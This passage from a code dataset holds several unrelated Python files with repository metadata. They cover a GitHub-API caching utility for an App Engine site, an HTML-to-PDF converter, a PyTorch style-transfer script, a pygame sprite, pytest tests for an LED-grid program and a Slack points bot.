authentication data\nclient_auth_data = memcache.get('client_auth_data')\nif not client_auth_data:\n with open('auth_data.json', 'r') as fh:\n auth_data = json.load(fh)\n client_auth_data = auth_data[\"client_auth_data\"]\n\n\ndef _get_live_data(handler, fragment):\n \"\"\"\n get_url_content's fragment['url'], b64decode's module['content']\n \"\"\"\n module = get_url_content(handler, fragment['url'])\n assert 'content' in module\n\n return base64.b64decode(module['content'])\n\n\ndef get_live_hardware_data(handler, fragment):\n \"\"\"\n Given a get_tree fragment,\n returns hardware data in a python dict\n \"\"\"\n return get_hardware_data(_get_live_data(handler, fragment))\n\n\ndef get_live_module_data(handler, fragment):\n \"\"\"\n Given a get_tree fragment,\n returns module data in a python dict\n \"\"\"\n return get_module_data(_get_live_data(handler, fragment))\n\n\ndef _get_tree(handler=None):\n \"\"\"\n Returns the file hierarchy/tree\n \"\"\"\n\n result = get_url_content(handler, 'https://api.github.com/repos/DCPUTeam/DCPUModules/git/trees/master')\n\n assert result['tree'], result\n return result['tree']\n\n\ndef get_modules(handler=None):\n \"\"\"\n Returns the file hierarchy/tree, filtered by a .lua extension\n \"\"\"\n tree = _get_tree(handler)\n\n return [\n fragment\n for fragment in tree\n if fragment['path'].endswith('.lua')\n ]\n\n\ndef get_module_names(handler):\n \"\"\"\n Returns list containing the path attributes of all modules\n \"\"\"\n\n modules = get_modules(handler)\n modules = map(itemgetter('path'), modules)\n return map(rpart, modules)\n\n\ndef get_url_content(handler, url):\n \"\"\"\n A wrapper around authed_fetch_json, caches results to help keep wait time short\n \"\"\"\n\n url_hash = md5_hash(url)\n result = memcache.get(url_hash)\n\n if result is None:\n logging.info('Getting the result from the GitHub API')\n\n try:\n result = authed_fetch_json(url)\n except urlfetch.DownloadError as e:\n logging.error(e)\n handler.error(408)\n return []\n else:\n memcache.set(url_hash, result)\n\n else:\n logging.info('Memcache get successful; %.40s' % result)\n # check if the api limit has been reached\n assert not result.get('message', '').startswith(\n 'API Rate Limit Exceeded for'), 'API Limit reached'\n return result\n\n\ndef authed_fetch(url, headers=None):\n # add admin contact, auth_data\n headers = headers or {}\n headers.update({'X-Admin-Contact': 'admin@lysdev.com'})\n\n # build the url\n url += '&' if '?' in url else '?'\n url += urllib.urlencode(client_auth_data)\n\n r = urlfetch.fetch(url=url, headers=headers)\n\n remaining = r.headers.get('x-ratelimit-remaining')\n if remaining:\n logging.info('{} requests remaining for this hour.'.format(remaining))\n memcache.set('requests_remaining', int(remaining))\n else:\n logging.info(\n 'Could not determine number of requests remaining for this hour')\n logging.info(r.content)\n\n return r\n\n\ndef authed_fetch_json(*args, **kwargs):\n \"\"\"\n parse json output from proxied authed_fetch\n \"\"\"\n return json.loads(authed_fetch(*args, **kwargs).content)\n\n\nclass BaseRequestHandler(webapp2.RequestHandler):\n def handle_exception(self, exception, debug_mode):\n if development():\n return super(BaseRequestHandler, self).handle_exception(exception, debug_mode)\n\n lines = ''.join(traceback.format_exception(*sys.exc_info()))\n logging.error(lines)\n template_values = {\n 'traceback': lines.replace('\\n', '
<br/>
')\n }\n html = self.dorender('error.html', template_values, write=False)\n mail.send_mail(\n sender='debugging@dcputoolchain-module-site.appspotmail.com',\n to=\"jack.thatch@gmail.com\",\n subject='Caught Exception',\n body=lines,\n html=html)\n if users.is_current_user_admin():\n raise exception\n else:\n self.error(500)\n if isinstance(exception, AssertionError):\n self.dorender('unexpected_result.html', {})\n\n def dorender(self, tname='base.html', values=None, write=True):\n \"\"\"\n automates some stuff so we dont have to type\n it in everytime we want to use a template\n \"\"\"\n\n self.response.headers['Content-Type'] = 'text/html'\n path = os.path.join(os.path.dirname(__file__), 'templates/' + tname)\n\n data = template.render(path, values or {})\n\n if write:\n self.response.out.write(data)\n else:\n return data\n\n\ndef development():\n return os.environ['SERVER_SOFTWARE'].find('Development') == 0\n\n\ndef rpart(path):\n return path.rpartition('/')[-1]\n\n\ndef md5_hash(string):\n return hashlib.md5(string).hexdigest()\n", "repo_name": "Mause/dcputoolchain-module-site", "sub_path": "src/dtmm_utils.py", "file_name": "dtmm_utils.py", "file_ext": "py", "file_size_in_byte": 5554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "google.appengine.api.memcache.get", "line_number": 35, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 35, "usage_type": "name"}, {"api_name": "json.load", "line_number": 38, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 49, "usage_type": "call"}, {"api_name": "module_utils.get_hardware_data", "line_number": 57, "usage_type": "call"}, {"api_name": "module_utils.get_module_data", "line_number": 65, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 98, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache.get", "line_number": 108, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 108, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 111, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch.DownloadError", "line_number": 115, "usage_type": "attribute"}, {"api_name": "google.appengine.api.urlfetch", "line_number": 115, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 116, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache.set", "line_number": 120, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 120, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 123, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 137, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch.fetch", "line_number": 139, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch", "line_number": 139, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 143, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache.set", "line_number": 144, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 144, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 146, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 148, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 157, "usage_type": "call"}, {"api_name": "webapp2.RequestHandler", "line_number": 160, "usage_type": "attribute"}, {"api_name": "traceback.format_exception", "line_number": 
165, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 165, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 166, "usage_type": "call"}, {"api_name": "google.appengine.api.mail.send_mail", "line_number": 171, "usage_type": "call"}, {"api_name": "google.appengine.api.mail", "line_number": 171, "usage_type": "name"}, {"api_name": "google.appengine.api.users.is_current_user_admin", "line_number": 177, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 177, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path", "line_number": 191, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 191, "usage_type": "call"}, {"api_name": "google.appengine.ext.webapp.template.render", "line_number": 193, "usage_type": "call"}, {"api_name": "google.appengine.ext.webapp.template", "line_number": 193, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 202, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 210, "usage_type": "call"}]} +{"seq_id": "71292949245", "text": "#\n# FILENAME.\n# topdf.py - To PDF Python App.\n#\n# FUNCTIONAL DESCRIPTION.\n# The app converts HTML files into pdf files.\n#\n# NOTICE.\n# Author: visualge@gmail.com (CountChu)\n# Created on 2023/4/5\n# Updated on 2023/4/29\n#\n\nimport argparse\nimport sys\nimport os\nimport pdfkit\n\nfrom core import util\n\nimport pdb\nbr = pdb.set_trace\n\ndef build_args():\n desc = '''\n Usage 1: python topdf.py -i out-ans-html -o out-ans-pdf\n Usage 2: python topdf.py -f 230328.TEE.html -i out-ans-html -o out-ans-pdf \n'''\n #\n # Build an ArgumentParser object to parse arguments.\n #\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter,\n description=desc)\n\n parser.add_argument(\n '-i',\n dest='input',\n required=True,\n help='The input directory that contains HTML files. E.g., \"output-html\"') \n\n parser.add_argument(\n '-o',\n dest='output',\n help='The output directory where the generated PDF files. E.g., \"output-pdf\"') \n\n parser.add_argument(\n '-f',\n dest='file',\n help='An HTML file in the input directory. E.g., \"230328.TEE.html\"') \n\n parser.add_argument(\n '-s',\n dest='silence',\n action='store_true',\n help='To display less messages.') \n \n #\n # Check arguments.\n #\n\n args = parser.parse_args()\n\n return args \n\ndef html_to_pdf(fn_css, fn_html, fn_pdf): \n print('Generating: %s' % (fn_pdf))\n \n f = open(fn_css)\n css_text = f.read()\n f.close()\n css_text = '' % css_text \n\n\n f = open(fn_html, encoding='utf-8')\n html_text = f.read()\n f.close()\n\n link_text = ''\n assert html_text.find(link_text) != -1\n\n html_text = html_text.replace(link_text, css_text)\n \n pdfkit.from_string(html_text, fn_pdf)\n\ndef main():\n\n #\n # Read arguments.\n #\n\n args = build_args()\n\n #\n # Check if the input directory exists.\n #\n\n if not os.path.exists(args.input):\n print('Error. The directory does not exist.')\n print(args.input)\n sys.exit(1) \n\n #\n # Check if the output directory exists. If not, make it.\n #\n\n if not os.path.exists(args.output):\n print('The directory does not exist. 
Building it')\n print(args.input)\n os.mkdir(args.output)\n\n #\n # Collect input HTML files.\n #\n\n bn_fn_ls = util.collect_input_files(args.file, args.input) \n\n #\n # Handle each HTML files.\n #\n\n for bn, fn in bn_fn_ls:\n name, ext = util.get_name(fn)\n if ext != '.html':\n print('Skip %s' % fn)\n continue \n\n fn_out = os.path.join(args.output, \"%s.pdf\" % (name))\n fn_css = os.path.join(args.input, \"github.css\")\n html_to_pdf(fn_css, fn, fn_out) \n\nif __name__ == '__main__':\n main()\n\n\n\n", "repo_name": "CountChu/ChatGptAnswerPdf", "sub_path": "topdf.py", "file_name": "topdf.py", "file_ext": "py", "file_size_in_byte": 3005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pdb.set_trace", "line_number": 22, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 33, "usage_type": "call"}, {"api_name": "argparse.RawTextHelpFormatter", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pdfkit.from_string", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 111, "usage_type": "call"}, {"api_name": "core.util.collect_input_files", "line_number": 117, "usage_type": "call"}, {"api_name": "core.util", "line_number": 117, "usage_type": "name"}, {"api_name": "core.util.get_name", "line_number": 124, "usage_type": "call"}, {"api_name": "core.util", "line_number": 124, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}]} +{"seq_id": "636947230", "text": "from __future__ import division\n\n\nfrom torchvision import models\nfrom torchvision import transforms\nimport torchvision\nimport torch.nn as nn\nimport torch\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef load_image(image_path, transform=None, max_size=None, shape=None):\n image = Image.open(image_path)\n if max_size:\n scale = max_size /max(image.size)\n size = np.array(image.size)*scale\n image = image.resize(size.astype(int),Image.ANTIALIAS)\n\n if shape:\n image = image.resize(shape,Image.LANCZOS)\n print(\"image size = \",image.size)\n\n if transform:\n image = transfrom(image).unsqueeze(0)\n print(image.shape)\n\n return image.to(device)\n\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(\n mean = [0.485,0.456,0.406],\n std = [0.229,0.224,0.225]\n )\n])\n\ncontent = load_image('content.jpeg',transform,max_size=400)\nstyle = load_image('style.jpeg',transform,shape=[content.size(3),content.size(2)])\n\n#print(content.shape)\n#print(content.size(2),content.size(3))\nunloader = transforms.ToPILImage()\nplt.ion()\ndef imshow(tensor,title=None):\n image = tensor.cpu().clone()\n image = unloader(image)\n plt.imshow(image)\n if title is not None:\n plt.title(title)\n 
plt.pause(0.001)\nplt.figure()\nimshow(style[0],title='StyleImage')\nimshow(content[0],title='ContentImage')\n\n# Define a VGG network used for feature extraction\nclass VGGNet(nn.Module):\n    def __init__(self):\n        super(VGGNet,self).__init__()\n        self.select = ['0','5','10','19','28']\n        self.vgg = models.vgg19(pretrained=True).features\n    def forward(self,x):\n        features = []\n        for name,layer in self.vgg._modules.items():\n            x = layer(x)\n            if name in self.select:\n                features.append(x)\n        return features\n\ntarget = content.clone().requires_grad_(True)\noptimizer = torch.optim.Adam([target], lr=0.003, betas=[0.5,0.999])\nvgg =VGGNet().to(device).eval()\n\ntotal_step = 2000\nstyle_weight = 100.0\nfor step in range(total_step):\n    target_features = vgg(target)\n    content_features = vgg(content)\n    style_features = vgg(style)\n    style_loss = content_loss = 0\n    for f1,f2,f3 in zip(target_features,content_features,style_features):\n        content_loss += torch.mean((f1-f2)**2)\n        _,c,h,w =f1.size()\n        f1 = f1.view(c,h*w)\n        f3 = f3.view(c,h*w)\n        f1 = torch.mm(f1,f1.t())\n        f3 = torch.mm(f3,f3.t())\n        style_loss += torch.mean((f1-f3)**2)/(c*h*w)\n    loss = content_loss + style_weight*style_loss\n    optimizer.zero_grad()\n    loss.backward()\n    optimizer.step()\n    if step % 10 ==0:\n        print('step [{}/{}],content loss : {},style loss : {}'\n              .format(step,total_step,content_loss.item(),style_loss.item()))\n\n# un-normalize with mean=-m/s and std=1/s of the normalization above\ndenorm = transforms.Normalize((-2.12,-2.04,-1.80),(4.37,4.46,4.44))\nimg = target.clone().squeeze()\nimg = denorm(img).clamp_(0,1)\nplt.figure()\nimshow(img,title='Target Image')\n", "repo_name": "XuLongjia/PyTorchLearning", "sub_path": "9ImageTransfer.py", "file_name": "9ImageTransfer.py", "file_ext": "py", "file_size_in_byte": 3062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.device", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 20, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 23, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 32, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 45, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.title", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 63, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.mean", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}]} +{"seq_id": "16258062372", "text": "from pygame.locals import *\nimport pygame\n\nWHITE = (255,255,255)\nGREY = (120,120,120)\nclass FieldGraphics(pygame.sprite.Sprite):\n # Constructor. Pass in the color of the block,\n # and its x and y position\n def __init__(self, color, width, height):\n # Call the parent class (Sprite) constructor\n pygame.sprite.Sprite.__init__(self)\n\n # Create an image of the block, and fill it with a color.\n # This could also be an image loaded from the disk.\n self.image = pygame.Surface([width, height])\n self.image.fill(color)\n self.image.set_colorkey(WHITE)\n # Fetch the rectangle object that has the dimensions of the image\n # Update the position of this object by setting the values of rect.x and rect.y\n pygame.draw.rect(self.image, color, [0, 0, width, height])\n self.rect = self.image.get_rect()\n\n def placeSign(self, isCross):\n if isCross:\n self.image = pygame.image.load(\"cross.png\").convert_alpha()\n else:\n self.image = pygame.image.load(\"circle.png\").convert_alpha()\n", "repo_name": "LordRysiek/MojaSiec2", "sub_path": "FieldGraphics.py", "file_name": "FieldGraphics.py", "file_ext": "py", "file_size_in_byte": 1078, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pygame.sprite", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "43850533013", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pytest\nfrom led.led import 
main, get_response, parse_args\nimport sys, os\n\n__author__ = \"Peng Ye\"\n__copyright__ = \"Peng Ye\"\n__license__ = \"GPL3\"\n\n\ndef test_get_response_001():\n    # assertion_001:\n    #\tverify that the return value is None if given an\n    #   incorrect filename or wrong url address\n    assert get_response('worth_path_name') == None\n\ndef test_get_response_002(capsys):\n    # assertion_002:\n    #   Verify that the output has the expected information\n    #   if given an incorrect filename or wrong url address\n    get_response('worth_path_name')\n    out,err = capsys.readouterr()\n    assert \"No such file or directory\" in out\n\ndef test_main_003(capsys):\n    # assertion_003:\n    #   Verify when 'turn on' the light from (120,120) to\n    #   (129,129), there will be 100 lights turned on\n    current_path = os.path.dirname(os.path.abspath(__file__))\n    sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_003.txt\"]\n    main()\n    out,err = capsys.readouterr()\n    assert \"100\" in out\n\ndef test_main_004(capsys):\n    # assertion_004:\n    #   Verify when 'turn on' the light from (120,120) to\n    #   (129,129), and 'turn off' the light from (110,110) to (120,120),\n    #   then there will be 99 lights turning on\n    current_path = os.path.dirname(os.path.abspath(__file__))\n    sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_004.txt\"]\n    main()\n    out,err = capsys.readouterr()\n    assert \"99\" in out\n\ndef test_main_005(capsys):\n    # assertion_005:\n    #   Verify when 'switch' the light from (120,120) to\n    #   (123,123), and 'switch' the light from (121,121) to (122,122),\n    #   then there will be 12 lights turning on\n    current_path = os.path.dirname(os.path.abspath(__file__))\n    sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_005.txt\"]\n    main()\n    out,err = capsys.readouterr()\n    assert \"12\" in out\n\ndef test_main_006(capsys):\n    # assertion_006:\n    #   Verify that incorrect light-handling keywords do nothing,\n    #   and that the program does not raise an error\n    current_path = os.path.dirname(os.path.abspath(__file__))\n    sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_006.txt\"]\n    main()\n    out,err = capsys.readouterr()\n    assert \"0\" in out\n    assert err == ''\n\ndef test_main_007(capsys):\n    # assertion_007:\n    #   Verify when 'turn on' the light from (-1,-1) to\n    #   (1,1), and 'turn on' the light from (999,999) to (1000,1000),\n    #   then there will be 5 lights turning on; lights outside\n    #   of the grid are not affected and NO error message is\n    #   raised\n    current_path = os.path.dirname(os.path.abspath(__file__))\n    sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_007.txt\"]\n    main()\n    out,err = capsys.readouterr()\n    assert \"5\" in out\n    assert err == ''\n\ndef test_parse_args_008(capsys):\n    # assertion_008:\n    # \tVerify that passing the \"--input\" parameter with a string\n    #   returns the string successfully\n    args = parse_args([\"--input\", \"url or filename\"])\n    out,err = capsys.readouterr()\n    assert args.input == 'url or filename'\n    assert out == ''\n\ndef test_parse_args_009(capsys):\n    # assertion_009:\n    # \tVerify that passing the \"--opt\" parameter with a string does\n    #   NOT return the string successfully\n    with pytest.raises(SystemExit):\n        args = parse_args([\"--opt\", \"url or filename\"])\n    out,err = capsys.readouterr()\n    assert 'unrecognized arguments' in err\n", "repo_name": "naitao/LED", "sub_path": "tests/test_led.py", "file_name": "test_led.py", "file_ext": "py", "file_size_in_byte": 3539, "program_lang": "python", "lang": "en", "doc_type": 
"code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "led.led.get_response", "line_number": 17, "usage_type": "call"}, {"api_name": "led.led.get_response", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 64, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 77, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 78, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 79, "usage_type": "call"}, {"api_name": "led.led.parse_args", "line_number": 88, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 97, "usage_type": "call"}, {"api_name": "led.led.parse_args", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "24576720672", "text": "import asyncio\nimport re\nfrom slack import RTMClient\nfrom slack import WebClient\nfrom slack.errors import SlackApiError\nimport threading\nfrom typing import Dict, List\n\nSLACK_TOKEN = open('slack_bot_token.txt').read().strip()\nMENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\n\nobjects = None\n\n# A cached list of users for id->name lookup\nusers_list = {}\n\n# The thread that the slack bot is running in\nthread = None\n\n# All of the available textures (set elsewhere)\ncheers_textures = []\n\n\ndef init(ursina_objects, textures:List[str]):\n global thread, objects, web_client, users_list, cheers_textures\n objects = ursina_objects\n cheers_textures = textures\n thread = SlackThread()\n thread.start()\n web_client = WebClient(SLACK_TOKEN)\n users = web_client.users_list()\n for member in users.data['members']:\n users_list[member['id']] = member\n return\n\n\ndef stop():\n global thread\n thread.stop()\n return\n\n\ndef user_info() -> Dict[str, str]:\n info = {}\n for user_id in users_list.keys():\n user = users_list[user_id]\n if 'real_name' in user and not user.get('deleted', True):\n info[user['name']] = user['real_name']\n return info\n\n\ndef help_text() -> str:\n s = 'Usage:\\n'\n s += '@Scrum Bot give @ \\n'\n s += 'Currently 
available cheers textures:\n'\n    for name in cheers_textures:\n        s += f'- {name}\n'\n    return s\n\n\n# It does not look like there is a way to have this be a member of SlackThread, since 'self' will never\n# be passed to the method\n@RTMClient.run_on(event='message')\n@RTMClient.run_on(event='app_mention')\ndef handle_message(**payload):\n    data = payload['data']\n    web_client = payload['web_client']\n    rtm_client = payload['rtm_client']\n    text = data.get('text', '')\n    give_matches = re.search(r'give\s<@(?P<give_to>\S*)>\s(?P<how_much>[0-9]+)\s*(?P<texture>\S*)?', text)\n    if give_matches:\n        name_from = users_list[data['user']]['name']\n        name_to = users_list[give_matches.group('give_to')]['name']\n        points = int(give_matches.group('how_much'))\n        texture = give_matches.group('texture')\n        print(f'Giving {points} from {name_from} to {name_to}')\n        objects['cheer_scoreboard'].transfer_points(name_from, name_to, points, texture=texture)\n    elif 'help' in text:\n        text = help_text()\n    channel_id = data['channel']\n    thread_ts = data['ts']\n    user = data['user']\n\n    try:\n        response = web_client.chat_postMessage(\n            channel=channel_id,\n            text=text,\n            thread_ts=thread_ts\n        )\n    except SlackApiError as e:\n        # You will get a SlackApiError if \"ok\" is False\n        assert e.response[\"ok\"] is False\n        assert e.response[\"error\"]  # str like 'invalid_auth', 'channel_not_found'\n        print(f\"Got an error: {e.response['error']}\")\n\n    return\n\n\nclass SlackThread(threading.Thread):\n    def __init__(self):\n        super().__init__()\n        self._running = False\n        self._bot_id = None\n        self._loop = asyncio.new_event_loop()\n        return\n\n    def run(self):\n        self._running = True\n        asyncio.set_event_loop(self._loop)\n        rtm_client = RTMClient(token=SLACK_TOKEN)\n        # rtm_client.start() does not like being run in a thread,\n        # so just do the parts of it that work in a thread manually....\n        future = asyncio.ensure_future(rtm_client._connect_and_read(), loop=self._loop)\n        self._loop.run_until_complete(future)\n        return\n\n    def stop(self) -> None:\n        self._loop.stop()\n        self.join()\n        return\n", "repo_name": "carlsonmark/ursina_test", "sub_path": "ursina_test/slack_bot.py", "file_name": "slack_bot.py", "file_ext": "py", "file_size_in_byte": 3642, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "slack.WebClient", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 43, "usage_type": "name"}, {"api_name": "re.search", "line_number": 70, "usage_type": "call"}, {"api_name": "slack.errors.SlackApiError", "line_number": 90, "usage_type": "name"}, {"api_name": "slack.RTMClient.run_on", "line_number": 63, "usage_type": "call"}, {"api_name": "slack.RTMClient", "line_number": 63, "usage_type": "name"}, {"api_name": "slack.RTMClient.run_on", "line_number": 64, "usage_type": "call"}, {"api_name": "slack.RTMClient", "line_number": 64, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 99, "usage_type": "attribute"}, {"api_name": "asyncio.new_event_loop", "line_number": 104, "usage_type": "call"}, {"api_name": "asyncio.set_event_loop", "line_number": 109, "usage_type": "call"}, {"api_name": "slack.RTMClient", "line_number": 110, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "15482774863", "text": "# TensorFlow and tf.keras\nimport tensorflow as tf\nfrom tensorflow.python.keras.models import Sequential\nfrom 
